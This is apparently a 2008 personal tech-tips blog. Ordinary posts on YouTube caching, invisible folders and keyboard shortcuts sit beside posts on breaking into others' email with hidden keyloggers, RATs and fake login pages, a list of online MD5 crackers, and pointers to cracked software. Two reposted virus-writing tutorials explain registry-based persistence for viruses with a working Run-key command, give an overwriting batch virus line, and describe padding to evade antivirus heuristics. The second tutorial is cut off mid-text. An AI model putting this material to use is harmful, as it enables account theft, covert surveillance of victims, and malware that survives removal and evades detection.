Open the youtube video page in firefox 3. Allow the video to play once.
Now the video is finished playing. Open a new tab in firefox 3. In the location bar (address bar) type
about:cache
and press enter. A new page will load. In the page see the heading
Disk cache device
Under that there is “Cache Directory”. There will be a long address similar to one shown below
C:\Documents and Settings\usrname\Local Settings\Application Data\Mozilla\Firefox\Profiles\abcd123h.default\Cache
Copy the full address (You must copy the cache link address from your computer. The above address is just to show and make you understand). Now open “My Computer”. In the address bar paste the already copied long address.
A folder will open. This folder contains the youtube video file in the form of cache. Note that the video file will be big in size. Now open VLC Media player or any other flv player. Drag and drop the bigger cache file in the media player. The file that plays the video is your video file. Copy and paste it in desktop. Rename the file to yourvideo1.flv (or any other name of your choice with flv extension).
Now you have saved the youtube video right from your firefox 3 cache rather than downloading it again.
You can watch the saved video while offline.
Tested in WinXP, Firefox3
Thursday, November 20, 2008
Save youtube videos directly from Firefox3 cache
Posted by egunda at 11:00 PM 0 comments
Creating invisible folders
This tutorial will not teach you to create hidden folders but invisible folders.
There is no point in creating hidden folders because you can just go to Tools > View > Show hidden files and folders.
Follow these steps:
1. Right click in a directory and go to New Folder.
2. Right click and then go to rename.
3. Delete the name and press Alt + 255. This will make the text disappear.
4. Right click on the folder once again but this time go to properties. Click on the "Customize" tab and go to the bottom where it says "Change Icon".
5. Scroll over and choose a blank icon like in this picture:
One minor flaw is that when you highlight the area with the folder, a small rectangle shows, indicating something is there. Also if you change the view to "Details" it will show it in Description.
Posted by egunda at 10:59 PM 0 comments
How To Turn Youtube Flv Videos Into..mp3
This is simple and most of you might already know it..but i thought i'd post it anyway.
I tought of this my self while i was converting 3gp (mobile phone) videos into .avi
First what you have to do is download a youtube video using a grabber or a grabing site (like tubeg
(save it as .flv (you all know that:P ) )
Then you can convert it to .avi or mpg or w/e you want simply by using this site
NOw when you browse and put the file it will give you a list of extention that you can cnvert it too..no mp3 is in there..unfotrunately you can only convert it to another video form....so you should voncert it to 3gp
Then you will browse the 3gp file again and you will see that there are 2 3gp types..one is for video and one is for music..choose the sound type (this way your file will be recongized are pure sound and no video in it) then you can choose convert to :mp3..and all done
that's it..pretty easy and pretty usefull since here are so many cool live conserts and music videos that i can't find on mp3
Posted by egunda at 10:59 PM 0 comments
Hacking yahoo/gmail and other email accounts
The most frequent questions asked by many people especially in a chat room is How To Hack Yahoo Password or any other email account.So you as the reader are most likely reading this because you want to break into somebody's email account.Here are some of the tricks that can be used to track an email password.
THINGS YOU SHOULD KNOW BEFORE PROCEEDING
There is no program that will crack the password of victim's account.There exist many password hacking programs which claims to do this,but unfortunately people using these kind of programs will only end up in frustration.None of these programs work since services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts.Another thing you must know if you ask this question in any "hacker" chat room/channel, you hear that you have to email some address and in any way you give up your password in the process, in attempt to crack others password.So DO NOT BELEIVE THIS.
TWO WAYS OF HACKING METHODS THAT YOU CAN TRY
IF YOU HAVE ACCESS TO VICTIM'S COMPUTER
If you have physical access to victim's computer then it's definitely possible to crack his password.This can easily be done by just installing a keylogger.
What is a keylogger? A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer's keyboard.
A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim's password.OK we can crack passwords using a keylogger but these are the questions that arise in our mind now!
1.Where is the keylogger program available?
A keylogger program is widely available on the internet.some of them are listed below
Powered Keylogger
Advanced keylogger
Elite Keylogger
Handy Keylogger
Quick Keylogger
Oops i think the above list is enough.There exists hundreds of such keyloggers available on the net.These are software keyloggers.There are also hardware Keyloggers available which can be directly attached to computer and can be used to sniff valuable data.These programs are none other than spyware! So use it @ your own risk.
2.How to install it?
You can install these keyloggers just as any other program but these things you must keep in mind.While installing,it asks you for a secret password and a hot key to enable it.This is because after installing the keylogger program is completely hidden and the victim can no way identify it.Keylogger is hidden from control panel,Program files,Start menu,Task manager so that it becomes completely invisible but runs in background monitoring the user activities.
3.Once installed how to get password from it?
The hacker can open the keylogger program by just pressing the hot keys(which is set during installation) and enter the password.Now it shows the logs containing every keystroke of the user,where it was pressed,at what time,including screenshots of the activities.
Some keyloggers also has a built in SMTP server.So once you install the keylogger on victim's computer you can just sit back in our place and receive the logs via email
4.Which keylogger program is the best?
According to me Elite Keylogger and Powered keylogger are the best.You can also read the features and side by side comparisions of them and select the best that suites your needs.
IF YOU DO NOT HAVE ACCESS TO VICTIM'S COMPUTER
Ofcourse the above method can only be employed if you can access victims computer.But what to do if we do not have access.In this case there exists many Remote Administration Tools commonly known as RATs available on net.Just try googling and you can get one.
OTHER WAYS OF HACKING PASSWORD
The other most commonly used trick to sniff password is using Fake Login Pages.
This is where many people get cheated.A Fake Login page is a page that appears exactly as a Login page but once we enter our password there ,we end up loosing it.
Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get an error "Page cannot be displayed".Many times we ignore this but finally we loose our valuable data.
Posted by egunda at 10:57 PM 0 comments
Labels: Hacking
Keyloggers (Keystroke Loggers)
Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.
There are two types of keystroke loggers:
1. Software based and
2. Hardware based.
Spy ware: Spector (http://www.spector.com/)
- Spector is a spy ware and it will record everything anyone does on the internet.
- Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.
- Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer's hard drive.
Hacking Tool: eBlaster (http://www.spector.com/)
- eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.
- eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.
- Within seconds of them sending or receiving an email, you will receive your own copy of that email.
Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)
- The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.
- It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.
Posted by egunda at 10:56 PM 0 comments
Labels: Hacking, Hacking Tools
Essential Hacking Tools For Every Hacker
Here is a list of all the essential hacking tools that every hacker should possess.Here in this post I will give details of different Hacking/Security tools and utilities along with the download links.I have also divided these tools into their respective categories for ease of understanding.
NETWORK SCANNERS AND TCP/IP UTILITIES
1. IP TOOLS
IP-Tools offers many TCP/IP utilities in one program. This award-winning program can work under Windows 98/ME, Windows NT 4.0, Windows 2000/XP/2003, Windows Vista and is indispensable for anyone who uses the Internet or Intranet.
It includes the following utilities
- Local Info - examines the local host and shows info about processor, memory, Winsock data, etc.
- Name Scanner - scans all hostnames within a range of IP addresses
- Port Scanner - scans network(s) for active TCP based services
- Ping Scanner - pings a remote hosts over the network
- Telnet - telnet client
- HTTP - HTTP client
- IP-Monitor - shows network traffic in real time & many more
Download IP Tools Here
2. NMAP
Nmap is a similar hacking/security tool as IP Tools which offer slightly different set of features.Unlike IP Tools Nmap is a freeware.It is designed to rapidly scan large networks, although it works fine against single hosts.Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available
Download Nmap Here
PASSWORD CRACKERS
1. LC4 (For Windows Password Recovery)
LC4 is the award-winning password auditing and recovery application, L0phtCrack. It provides two critical capabilities to Windows network administrators:
- LC4 helps administrators secure Windows-authenticated networks through comprehensive auditing of Windows NT and Windows 2000 user account passwords.
- LC4 recovers Windows user account passwords to streamline migration of users to another authentication system or to access accounts whose passwords are lost.
2. SAMINSIDE (For Windows Password Recovery)
SAMInside is designated for the recovery of Windows NT/2000/XP/2003/Vista user passwords.
The following are some of the highlighting features of Saminside.
- The program doesn't require installation.It can be directly run from CD,Disk or Pendrive.
- Includes over 10 types of data import and 6 types of password attack
- Brute-force attack
- Distributed attack
- Mask attack
- Dictionary attack
- Hybrid attack
- Pre-calculated tables attack
- Run's very fast since the program is completely written in assembler.
You Can Get Saminside From Here
3. MESSENPASS (For Instant Messenger Password Recovery)
Messenpass is a password recovery tool for instant messengers.It can be used to recover the lost passwords of yahoo messenger or windows messenger.It is too easy to use this tool.Just double-click this tool and it reveals the username and passwords that are stored in the system.
Download MessenPass Here
REMOTE ADMINISTRATION TOOLS (RAT)
RADMIN
Radmin (Remote Administrator) is the world famous, award winning secure remote control software and remote access software which enables you to work on a remote computer in real time as if you were using its own keyboard and mouse.
Radmin has the following features.
- Access and control your home and office computer remotely from anywhere
- Perform systems administration remotely
- Provide Help Desk (remote support) functions for remote users
- Work from home remotely
- Manage small, medium, and large networks remotely
- Organize online presentations and conferences
- Share your desktop
- Teach and monitor students' activities remotely
Download Radmin Here
Most of the above tools are shareware which means that you have to pay for them.But they are really worth for their money.Most of the time freewares offer limited functionality/features than the sharewares and hence I recommend them to my visitors.But still you can get 99% of all the softwares for free (cracked versions) on the internet and if u search on this site itself you will find almost all of the above mentioned softwares free :)
Posted by egunda at 10:55 PM 0 comments
Labels: Hacking, Hacking Tools
Free Tools For Spyware Removal
There are lot of PC users who know only little about "Spyware", "Malware", "hijackers", "Dialers" & many more. This article will help you avoid pop-ups, spammers and all those baddies.
What is spy-ware?
Spyware is computer software that is installed surreptitiously on a personal computer to intercept or take partial control over the user's interaction with the computer, without the user's informed consent.The term spyware suggests software that secretly monitors the user's behavior.Spyware programs can collect various types of personal information, such as Internet surfing habit, sites that have been visited etc.
How to check if a program has spyware?
It is this little site that keeps a database of programs that are known to install spyware.
Check Out: SpywareGuide
How To Block Pop-Ups?
If you would like to block pop-ups (IE Pop-ups) there are tons of different tools out there, but these are the two best, I think.
Try: Google Toolbar - This tool is a Freeware.
Try: AdMuncher - This tool is a Shareware.
How To Remove Spywares?
If you want to remove spwares then you may try the following tools/programs
Try: Lavasoft Ad-Aware - This tool is a freeware.
Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.
Try: Spybot-S&D - This tool is a freeware.
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.
Try: Spy Sweeper - This tool is a shareware.
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.The best scanner out there, and updated all the time.
Try: BPS Spyware and Adware Remover - This tool is a shareware.
Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove.
How To Prevent Spyware?
To prevent spyware attack you can try the following tools.
Try: SpywareBlaster - This tool is a freeware.
Info: SpywareBlaster doesn't scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.
Try: XP-AntiSpy - This tool is a freeware.
Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people
Posted by egunda at 10:55 PM 0 comments
Radmin Remote Administrator 3.2 - a nice hacking software
Remote Administrator is the fastest remote control software. You see
the remote computer screen displayed either in a window or full
screen on your computer monitor. All mouse and keyboard functions are
transferred to the remote computer. You can work with the remote
computer as if you are sitting in front of it. According to our tests
and our users feedback Remote Administrator outperforms all other
remote controls in the speed of work.
System Requirements
nothing special
What's new
Support for Windows Vista SP1; Support for Windows Server 2008; Faster speed and smooth performance; Left-hand mouse support; Support for 27 languages.
download: http://rapidshare.com/files/141494291/Radmin__Remote.Administrator__3.2.rar
mirror: http://rapidshare.com/files/162064523/Radmin__Remote.Administrator__3.2_www.balkanw.org.rar
Posted by egunda at 10:54 PM 0 comments
Labels: Hacking, Hacking Tools
best keyboard shortcut keys
Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:
Windows key + R = Run menu
This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
[Alt] and [Esc] Switch between running applications
[Alt] and letter Select menu item by underlined letter
[Ctrl] and [Esc] Open Program Menu
[Ctrl] and [F4] Close active document or group windows (does not work with some applications)
[Alt] and [F4] Quit active application or close current window
[Alt] and [-] Open Control menu for active document
Ctrl] Lft., Rt. arrow Move cursor forward or back one word
Ctrl] Up, Down arrow Move cursor forward or back one paragraph
[F1] Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box
acessability shortcuts
Right SHIFT for eight seconds........ Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on
Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.
SHIFT....... five times Switch StickyKeys on and off.
NUM LOCK...... for five seconds Switch ToggleKeys on and off.
explorer shortcuts
END....... Display the bottom of the active window.
HOME....... Display the top of the active window.
NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.
NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.
LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.
RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.
Type the following commands in your Run Box (Windows Key + R) or Start Run
devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
internetbrowser
type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it
For Windows XP:
Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an it
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.
Use these keyboard shortcuts for dialog boxes:
To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE
If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:
Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U
accessibility keyboard shortcuts:
Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U
shortcuts you can use with Windows Explorer:
Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder.
posted by :
♫м!κн!L ♫๓เкђเl♫ in OUG
Posted by egunda at 10:53 PM 0 comments
Labels: Tricks
Tuesday, October 21, 2008
online MD5 crackers
http://www.md5lookup.com/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/
http://passcrack.spb.ru/ ->sha1
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.securitystats.com/tools/hashcrack.php ->sha1
http://www.md5decrypter.com/
http://www.md5encryption.com/ ->sha1
http://www.md5database.net/
http://md5.xpzone.de/
http://www.milw0rm.com/md5/info.php
http://md5.geeks.li/
http://www.hashreverse.com/ ->sha1
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php ->sha1
http://rainbowcrack.com/ ->sha1
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in...roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.shalookup.com/ ->sha1
lm Only:
http://sys9five.ath.cx:8080/hak5rtables/
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/
some more links
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
http://www.md5-db.com/
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.milw0rm.com/md5/
http://www.mmkey.com/md5/
http://www.rainbowcrack-online.com/
http://www.securitydb.org/cracker/
http://www.securitystats.com/tools/hashcrack.php
http://schwett.com/md5/
http://www.und0it.com/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://www.tmto.org
http://md5.rednoize.com/
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.php?main_page=product_info&cPath=3&products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/
Posted by egunda at 3:00 AM 0 comments
Labels: Hacking
Thursday, October 16, 2008
The Secure Virus-Copy
*************************************************************
*************************************************************
************ ***********
************ The Secure Virus-Copy ***********
************ by Second Part To Hell/[rRlf] ***********
************ ***********
*************************************************************
*************************************************************
Index:
******
0) Intro Words
1) The Idea
2) Important marginal notes
a) Inverted commas
b) 'exit'-command
c) '@echo'-command
d) '%~a'-option
e) '>>'-option
3) How to use it
a) General Information
b) Where to store the code
4) Last words
0) Intro Words
The title of this article sounds really strange and I'm sure, you can't think
what I'll tell you now. Don't worry, you will get the point while reading this
text. First I have to thank three persons, who's viruses or articles helped me
to get this idea. First person is Benny, who wrote a great article called
'Some ideaz about future worms', which was released in 29a#6. In his article he
mentioned that a worm 'should not be stored at any file on the disk'. The second
important person, who's virus helped me to get the idea and bring the idea to
reallity was Lys Kovick with his WinREG.AntiREG. Last but not least Q the Misanthrope's virus Bat.OneLine wsa very important for this article. To all these guys I have to send out a really great 'THANK YOU'! :D Well you still can't think about my idea, so I'll stopp writing this silly intro and start to come to the important parts...
1) The Idea
The idea is, as you should have already noticed, a copy of the virus, which can't
be detected. Let's consider the scan of a Antivirus-Program. The program detects
every virus, which is already in the virus-definition, in (most times) every file
at the computer. Now: What would be, if the virus doesn't exist in any file at the
computer??? It is not detected. You may think, "Damn, silly boy, how should the virus
work?". The answere's name is Registy...
As you may know, you can run any program with the right extansion via the registry.
That is the main point. You just have to store a copy of the virus/worm's code in registry
(if it's script than it's easy, if it's a binary you have to debug it later on). Now
let's think that the virus is in the registry, how we get it out from there?
As I have already told you, you can run programs via registry... One of this programs
you can run is called 'CMD.exe', the new Windows 2000 Command-Interpreter.
The think get's tricky now: As you may know, your CMD.exe has a command called 'for',
we are going to use it now. Why? Well, it's doubtful that your virus just have one line,
therefore we have to use one line (registry just allows one line of CMD.exe-code) bringing
your virus-code to a new file. Maybe you didn't fully understand what I meant, therefore
I'll show you an example now. This is the content of a new registy-key, which is stored
in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
- - - - - - - - - - - - - -
cmd /c for %a in ("@echo off" cls "echo Second Part To Hell was here..." pause exit) do @echo %~a>>C:\example.cmd
- - - - - - - - - - - - - -
Now guess the effects of this key! Every start-up of the computer it will generate a new
file called C:\example.cmd with the code between the inverted commas. Cool we got
a new file onto the computer... I'm sure that you know it: The code should be your virus
code. :). Now let's say, a virus uses such a code. First run it installs the key with
it's code. Some time later the user notices that something smells fishy and scanns trough
the harddisk. It finds a few copies of the virus and delets it. Now the cool thing:
It doesn't matter as the virus has it's code saved in the registry. And this code is ready
to infect the computer again and again (and again...).
2) Impotant marginal notes
There are some stranges in that line, which you have to note, otherwise you will have
hard problems getting the code working:
a) Inverted commas
You have to set the commands between inverted commands, if the line you want to write to
a new file contains at least one blank space. Otherwise CMD.exe treat it as more commands
with the side-effects, that it writes every part to a new line. If the command doesn't contain
a blank space, you may not use inverted commas.
b) 'exit'-command
After writing all your code to a .CMD or .BAT file, you have to use an 'exit'-command, since
you may write the whole code to the file every computer run. That's also the reason why
you must not use lables or gotos.
c) '@echo'-command
You have to use @echo to write strings to a file. If you would use just 'echo', you would
also write the primary command to it (i.e.: C:\Windows\System32>echo cls>>C:\example.cmd AND
cls).
d) '%~a'-option
If you have used a multi-part-command (which contains blanc space[s]), you have to use inverted
commands, as I have already told you. Using the simple '%a'-option, you would also write that
inverted commas to the code (which you don't want I think). To write the code without that
inverted commas you have to use '%~a'. (Of course, you could also use another variable-letter).
e) '>>'-option
When you try to use '>' to write your code to a file, you won't have success as CMD.exe overwrites
everything in the file (the lines you have already written) with the new one with the result that
the file contains JUST the last line you wanted to write.
3) How to use it
a) General Information
I've already told you, how the technique works, but not how to use it. Well, here we are.
First thing your virus should do when it's activ is to search the AutoStart-Directory, after
that it should write the modified code (the code above with the new directory+filename) to the
registry. That's all, easy - isn't it?! :)
b) Where to store the code
This is maybe the most important decision you have to make. Here are a few opportunities with
it's pro and contra.
--> Standart-Registry-Run
For Example: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
This is maybe the easiest and saved way to make sure that the virus will be started every
computer-Run. But the problem is that even low- and and medium-knowlegde computer users know
how to find a key here. That's a big problem...
--> Command Processor-AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
The good thing is that nearly nobody knows about this key. The key forces the CMD.exe to
run a command or a file before the real window opens. The code would run when the
user opens a .CMD/.BAT file or open directly the CMD.exe. The problem is that a normal user
don's use these things. :(
--> Hooking File-extansions
malfunction wrote an article about that and released it in 29a#6. He used that technique
to run a virus/worm-file before an .EXE is executed. We can use the same technique modified.
just put the code above instead of malfunction's filename, and it should work.
4) Last words
Here, at the end of my article, I really want to thank you for still being with me and
reading this. I am really happy that I've finally finished this technique and this article, and
I would be even happier if you could send me your opinion of this way to make a secure virus copy.
I know that this article looks like it's just a technique for batch viruses, but it isn't! You
can use it in every file-virus/worm for Windows. Just use the command 'debug', which is really easy.
As you can imaging, I will write such a virus as soon as possible, and for showing you that it's
possible, it will become a binary virus. :)...
Greets goes to everybody who knows me (I'm too lazy to write them all down again, you know who you
are - just look at my homepage :D)...
A special greets goes to my RainBow, ILD!
- - - - - - - - - - - - - - -
Second Part To Hell/[rRlf]
www.spth.de.vu
spth@priest.com
written from april-may 2004
Austria
- - - - - - - - - - - - - - -
Posted by egunda at 9:34 AM 0 comments
Labels: Virus Writing
Useful Things In Batch
A tutorial by: by Second Part To Hell/[rRlf]
************************************************************* ************************************************************* ************ *********** ************ Useful things in Batch *********** ************ by Second Part To Hell/[rRlf] *********** ************ *********** ************************************************************* ************************************************************* .intro words While making my Batch WOrm Generator I discovered much very useful techniques for Batch viruses, for instands about Encryption or Polymorphism. But I discovered also some other techniques. These are Anti AVA techniques, and I thought, I don't have to let them die. Now let's start... .index I'm sure, that you want to know, about which techniques I want to talk. So, here is the shit of content :) 1) Including fake bytes 2) Useing a undeletable directory (Not for Win00|NT|XP) 3) Including the EICAR-Testfile 4) Pseudo-Trash between the code .Including fake bytes This is a special Anti-KAV-heuristic technique. Maybe you know, that KAV only searchs in the first 1000 Bytes for the virus (I think, only in batch viruses). What does that mean for us? Guess what? :) We inlude befor of the start of our virus 1000 silly bytes, which don't do anything. And what is t effect? Let's test it. First we have a very silly code-string, that only spread itself in the current dir via overwriting Batch-files. KAV named it 'BAT.Silly.d'. - - - - - - - - - - [ BAT.Silly.d ] - - - - - - - - - - for %%a in (*.bat) do copy %0 %%a - - - - - - - - -[ End of BAT.Silly.d ]- - - - - - - - - Now let's test our new technique. Includeing 1000 fake-Byte should not be a serious problem. Because of the fact, that batch ignore simple input-errors we won't have any problems with it. My string contains random lowercase-letters. But it should be no problme to include also other letters like Uppercase or numbers and so on. Important Note: Do not include a '<' or a '>', because the computer will 'think', that you want to read/write from a file. - - - - - - - - - - [ Fake Bytes ] - - - - - - - - - - stjrdnfuqlgmpuwefguowyakzxgkxolraxozihswcfngwkpaolmmyfrzmsxbcnvrmwrtnjpwybshmhxjtimvzwjuoakncjwynilyp zciptpriqzrfqkqwgfiqpivuityndlqmlivmdtkjuynjdxzmpjedfjacsqgybiwcamxxxwolzzkprquufavkqfdyuqjcxvpizrakx pdmogwizgfrjhvxrmeewywmknxbqbthypeksxmywlfaijracwftfsflicvgfwqzsnrductwbvvtkkzerzgpcbzkngktcdfybzsnby emlcctvneufmhnvfsutoqnldznssinuqigrxbzyxwfmblnqhxztsokqyldnimzgjsmqwshasowgjrmwldkikgjwuffflhwugwrbqd qhbueiaahtvwmhfrhntudpvscpkiftyiwceboltowopsojwxbuarilavnacqlljixreykldgdqxdckayqztleotrbijiwzpesheyd cweyfyrldgvwkcocrqfqtlxuchxdhkpddokhpvxcihqshgqnpjoeqlxspcncyzlvkywzbtijvuiazhevcorognwzgscmmcappqrzw 